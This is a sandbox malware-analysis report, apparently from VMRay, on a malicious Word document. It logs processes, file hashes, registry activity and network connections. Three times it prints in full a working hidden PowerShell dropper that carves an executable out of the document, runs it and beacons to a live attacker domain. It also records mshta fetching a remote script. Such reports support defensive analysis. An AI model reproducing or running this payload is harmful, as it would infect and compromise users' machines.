VMRay Analyzer Report for Sample #19989 VMRay Analyzer 2.2.0 URI www.samyrai777m.p-host.in Resolved_To Address 185.211.244.133 Process 1 2480 winword.exe 1324 winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" C:\Users\aETAdzjz\Desktop\ c:\program files\microsoft office\root\office16\winword.exe Child_Of Child_Of Child_Of Child_Of Created Read_From Read_From Created Created Created Created Created Opened Deleted Deleted Created Opened Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Read_From Connected_To Connected_To Connected_To Process 2 2976 csc.exe 2480 csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline" C:\Users\aETAdzjz\Desktop\ c:\windows\microsoft.net\framework64\v2.0.50727\csc.exe Child_Of Process 3 3000 cvtres.exe 2976 cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\aETAdzjz\AppData\Local\Temp\RESEDB9.tmp" "c:\Users\aETAdzjz\Desktop\CSCED98.tmp" C:\Users\aETAdzjz\Desktop\ c:\windows\microsoft.net\framework64\v2.0.50727\cvtres.exe Process 4 3008 mshta.exe 2480 mshta.exe "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 C:\Users\aETAdzjz\Desktop\ c:\windows\system32\mshta.exe Child_Of Created Opened Opened Opened Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 5 3016 mshta.exe 2480 mshta.exe "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 C:\Users\aETAdzjz\Desktop\ c:\windows\system32\mshta.exe Child_Of Child_Of Created Opened Opened Opened Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 6 988 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe Process 7 880 mshta.exe 2480 mshta.exe "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 C:\Users\aETAdzjz\Desktop\ c:\windows\system32\mshta.exe Child_Of Created Opened Opened Opened Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 8 1636 powershell.exe 3016 powershell.exe "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} C:\Users\aETAdzjz\Desktop\ c:\windows\system32\windowspowershell\v1.0\powershell.exe Opened Read_From Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 9 684 powershell.exe 3008 powershell.exe "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} C:\Users\aETAdzjz\Desktop\ c:\windows\system32\windowspowershell\v1.0\powershell.exe Child_Of Created Opened Opened Opened Read_From Wrote_To Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 10 2408 powershell.exe 880 powershell.exe "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} C:\Users\aETAdzjz\Desktop\ c:\windows\system32\windowspowershell\v1.0\powershell.exe Opened Read_From Read_From Read_From Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 11 1524 taskkill.exe 684 taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im winword.exe C:\Users\aETAdzjz\Desktop\ c:\windows\system32\taskkill.exe Child_Of Process 12 844 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs C:\Windows\system32\ c:\windows\system32\svchost.exe File windows\microsoft.net\framework64\v2.0.50727\config\machine.config windows\microsoft.net\framework64\v2.0.50727\config\machine.config c:\ c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config config File users\aetadzjz\desktop\logo.cs users\aetadzjz\desktop\logo.cs c:\ c:\users\aetadzjz\desktop\logo.cs cs MD5 667a8968a36880dc4147d2ce00c64b30 SHA1 48233228f9babdd3bcac5b85d5ae258f91204f7e SHA256 8aea15951d21f30f44a8d7499472b62473203959659eeb2b9059b64698deacfd File users\aetadzjz\appdata\local\temp\91rxrejg.tmp users\aetadzjz\appdata\local\temp\91rxrejg.tmp c:\ c:\users\aetadzjz\appdata\local\temp\91rxrejg.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\local\temp\91rxrejg.0.cs users\aetadzjz\appdata\local\temp\91rxrejg.0.cs c:\ c:\users\aetadzjz\appdata\local\temp\91rxrejg.0.cs cs MD5 3992ea6c0751d769815a98c4cffcadce SHA1 6ba244d7eb6a6facd2b4c4e946e26987d2336e8b SHA256 b12a34c289c97db64f4267e5c67b70f4fefedfe28ae6527e7721a6ef3e4e0adc File users\aetadzjz\appdata\local\temp\91rxrejg.cmdline users\aetadzjz\appdata\local\temp\91rxrejg.cmdline c:\ c:\users\aetadzjz\appdata\local\temp\91rxrejg.cmdline cmdline MD5 8d42a6a6ddda3cb8546ef4cb888dbfa8 SHA1 2024365b4311bc93867119ceee7c876683fef607 SHA256 f0d80af454b0e9060f13236c0827a4df63d61ac4964a174c999f4aa2895ff00e File users\aetadzjz\appdata\local\temp\91rxrejg.out users\aetadzjz\appdata\local\temp\91rxrejg.out c:\ c:\users\aetadzjz\appdata\local\temp\91rxrejg.out out MD5 51bfb6f473aa25324ee1ed9830ca806e SHA1 f1fae130030df5b4dff15ed820ca35665886ea98 SHA256 60a57285c3ccbfa3f03f050681e54c27de4ef1766fe6151104a919b7f7c8fa2e File users\aetadzjz\appdata\local\temp\91rxrejg.err users\aetadzjz\appdata\local\temp\91rxrejg.err c:\ c:\users\aetadzjz\appdata\local\temp\91rxrejg.err err MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File STD_INPUT_HANDLE File users\aetadzjz\appdata\local\temp\91rxrejg.pdb users\aetadzjz\appdata\local\temp\91rxrejg.pdb c:\ c:\users\aetadzjz\appdata\local\temp\91rxrejg.pdb pdb File users\aetadzjz\desktop\__sn.cs users\aetadzjz\desktop\__sn.cs c:\ c:\users\aetadzjz\desktop\__sn.cs cs File windows\system32\com\soapassembly windows\system32\com\soapassembly c:\ c:\windows\system32\com\soapassembly Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application\COM+ SOAP Services HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\COM+ SOAP Services HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\COM+ SOAP Services HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\COM+ SOAP Services HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center\COM+ SOAP Services HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\COM+ SOAP Services HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Security HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System\COM+ SOAP Services HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\COM+ SOAP Services HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallationType InstallationType WinRegistryKey SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance HKEY_LOCAL_MACHINE Library Library IsMultiInstance IsMultiInstance First Counter First Counter WinRegistryKey SYSTEM\CurrentControlSet\Services\.net clr networking\Performance HKEY_LOCAL_MACHINE CategoryOptions CategoryOptions FileMappingSize FileMappingSize Counter Names WinRegistryKey HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE DNSRecord www.samyrai777m.p-host.in SocketAddress 185.211.244.133 80 TCP NetworkSocket 185.211.244.133 80 TCP Contains SocketAddress www.samyrai777m.p-host.in 80 NetworkConnection HTTP www.samyrai777m.p-host.in 80 URI www.samyrai777m.p-host.in/t/tp.php?thread=0 Contains URI None File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE Mutex Local\!PrivacIE!SharedMemory!Mutex WinRegistryKey clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 HKEY_CLASSES_ROOT WinRegistryKey Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\PageSetup HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Windows\CurrentVersion\Policies\Explorer HKEY_CURRENT_USER NoFileMenu NoFileMenu NoFileMenu WinRegistryKey Software\Microsoft\Internet Explorer\PageSetup HKEY_CURRENT_USER Print_Background Print_Background Print_Background File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl 